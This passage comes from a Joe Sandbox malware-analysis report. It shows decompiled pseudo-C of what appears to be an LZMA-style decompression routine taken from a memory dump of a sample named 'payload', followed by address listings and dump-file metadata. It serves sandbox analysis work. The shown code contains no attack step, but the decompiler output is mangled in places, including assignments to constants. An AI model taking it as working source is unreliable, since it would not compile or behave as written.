											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406779
0x00406779
0x00406779
0x00406779
0x0040677f
0x00406783
0x00406787
0x00406791
0x0040679f
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00406aac
0x00406aac
0x00406ab0
0x00000000
0x00000000
0x00406ab2
0x00406abb
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad3
0x00406aec
0x00406aef
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b09
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406ab0
0x00000000
0x00000000
0x00000000
0x00406b0b
0x00406b0b
0x00406a84
0x00406a88
0x00406bc0
0x00406bc0
0x00406bca
0x00406bd2
0x00406bd9
0x00406bdb
0x00406be2
0x00406be6
0x00406be6
0x00406a8e
0x00406a94
0x00406a9b
0x00406aa3
0x00406aa3
0x00406aa6
0x00000000
0x00406aa6
0x00406b10
0x00406b1d
0x00406b20
0x00406a2c
0x00406a2c
0x00406a2c
0x004061c8
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x004061d7
0x00000000
0x004061de
0x004061e2
0x00000000
0x00000000
0x004061e8
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406243
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00406b33
0x00000000
0x00406b33
0x0040628d
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062b7
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00406b42
0x00000000
0x00406b42
0x004062fd
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a01
0x00406a05
0x00406bb4
0x00406bb4
0x00000000
0x00406bb4
0x00406a0b
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00406a26
0x00406a26
0x00406a2c
0x00406a2c
0x00000000
0x00000000
0x00406344
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x00000000
0x004063d1
0x0040634b
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b2
0x004063b4
0x00000000
0x00406396
0x00406396
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x004063ad
0x00000000
0x004065e3
0x004065e3
0x004065e7
0x00406605
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x00000000
0x00000000
0x0040664d
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x00000000
0x00000000
0x00406690
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00406701
0x00406701
0x00406705
0x0040670c
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x00000000
0x0040671c
0x00406707
0x00406707
0x00000000
0x00000000
0x00406728
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x00000000
0x00000000
0x0040697a
0x0040697a
0x0040697e
0x004069a0
0x004069a0
0x004069a3
0x004069ad
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00406980
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00406a82
0x00406a3d
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b28
0x00406b2b
0x00406a2c
0x00406a2c
0x00406a2c
0x00000000
0x00406a32
0x00000000
0x00406762
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00406a82
0x00000000
0x00000000
0x00000000
0x004067a7
0x004067a7
0x004067aa
0x004067e0
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406840
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x00406975
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406973
0x00406ba8
0x00406ba8
0x00000000
0x00000000
0x004061d7
0x00406bdf
0x00406bdf
0x00000000
0x00406bdf
0x00406a2c
0x00406aac
0x00406a75

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
